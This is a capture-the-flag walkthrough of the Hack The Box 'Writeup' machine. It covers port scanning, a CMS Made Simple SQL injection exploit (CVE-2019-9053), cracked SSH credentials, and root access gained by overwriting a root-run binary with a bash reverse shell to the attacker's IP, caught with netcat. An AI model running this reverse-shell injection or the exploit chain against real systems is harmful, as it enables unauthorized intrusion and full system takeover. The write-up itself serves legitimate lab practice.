Hello fellow hackers, today im going to solve writeup machine from hack the box
so, let’s get started!!!
I started with nmap to check the open ports on the machine
nmap -A -v -sT 10.10.10.138
so the machine has two ports open on it :
1 – ssh running on port 22
2- Apache web server running on port 80
so let check it out !!!
after opening the web server , it seems like it displaying a message telling us that the site is not ready yet and it already been under attack
back to my nmap scan i noticed that web server has robots.txt file on it and it’s disallowing /writeup directory , seems interesting? lets find out
after checking out the /writeup directory , it looks like it a writeups made for retired hack the box machines , so after going through the page source i noticed something interesting, the meta data of the page shows it was made by a cms called CMS Made Simple
i checked out for any public exploits using searchsploit and found one exploiting sql injection and bruteforce the users and there email , you can look the cve up cve-2019-9053
searchsploit "cms made simple"
i ran the script and used rockyou.txt list to bruteforce the db
python cms.py https://10.10.10.138/writeup --crack rockyou.txt
and boom !!! we have it
we have the user jkr and his hash salt and the hash!!!!
after cracking the password here’s what we have
user : jkr
password : raykayjay9
cool lets test those creds on ssh !!!
and boom !!! we have shell
so we are in as jkr and we have the user.txt !!!
after some enumeration nothing interesting caught my intention ,so i decided to see what going on backstage , so i used pspy64 to monitor the process that is running by all users on the machine
you can find it on GitHub
after running the tool i noticed something
./pspsy64 -i 1000
every time some one login to the machine a job is being executed by the root user
lets abuse that
first i check my path and it was different from the one that is executed by the the root so i changed it
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
then i ran this command to inject my code inside the executed process
echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.12.92/444 0>&1'" > /usr/local/bin/run-parts
then i started a netcat listener on my machine
nc -vlp 444
after that i logged out from ssh and logged in again , and there its a root shell !!!
SMT Red Team